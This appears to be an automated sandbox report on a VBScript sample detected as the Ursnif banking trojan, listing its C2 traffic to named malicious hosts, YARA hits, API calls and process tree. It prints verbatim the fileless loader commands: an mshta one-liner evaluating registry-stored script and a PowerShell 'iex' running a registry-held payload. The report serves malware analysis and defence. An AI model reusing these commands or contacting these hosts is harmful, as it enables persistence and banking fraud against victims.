Source: global traffic; HTTP traffic detected:
  POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  Content-Length: 2
  Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic; HTTP traffic detected:
  POST /08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=124046255642640572323054504739
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  Content-Length: 675
  Host: art.microsoftsofymicrosoftsoft.at
Source: rundll32.exe, 00000012.00000002.870125823.0000000000B1A000.00000004.00000020.sdmp; String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000012.00000003.809344105.0000000000B86000.00000004.00000001.sdmp; String found in binary or memory: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW
Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmp; String found in binary or memory: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000016.00000003.845905572.00000200ADF45000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp; String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.872464143.00000200AE0A1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; HTTP traffic detected:
  POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  Content-Length: 2
  Host: art.microsoftsofymicrosoftsoft.at
Source: unknown; DNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected Ursnif
                    Source: Yara match | File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara match | File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    Yara detected Ursnif
                    Source: Yara match | File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara match | File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                    System Summary:

                    Writes registry values via WMI
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F2725F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F27E30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F21754
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05753570
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_057310E6
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_057390A1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05735C88
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05747B5D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_057443B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0573FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0573423D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0574DAED
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0573E6B4 CreateProcessAsUserA,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F26EB3 GetProcAddress,NtCreateSection,memset,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F27666 NtMapViewOfSection,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F28055 NtQueryVirtualMemory,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_057509D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0574B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0574F7F5 NtQueryInformationProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0575079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05746657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05740E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05735166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05739D36 NtGetContextThread,RtlNtStatusToDosError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_057455D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05745878 memset,NtWow64QueryInformationProcess64,GetProcAddress,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05740CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05748890 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0574A71C NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05740FBD memset,NtQueryInformationProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0574FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05750BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0573579C NtQuerySystemInformation,RtlNtStatusToDosError,
                    Source: cshxvr3e.dll.26.dr | Static PE information: No import functions for PE file found
                    Source: kuljoghz.dll.24.dr | Static PE information: No import functions for PE file found
                    Source: sample.vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
                    Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210910
                    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
                    Source: classification engine | Classification label: mal100.troj.evad.winVBS@22/20@7/1
                    Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F22102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B68F86DF-9DC3-5870-D74A-210CFB1EE500}
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_01
                    Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F660447E-DDE3-9893-178A-614C3B5E2540}
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
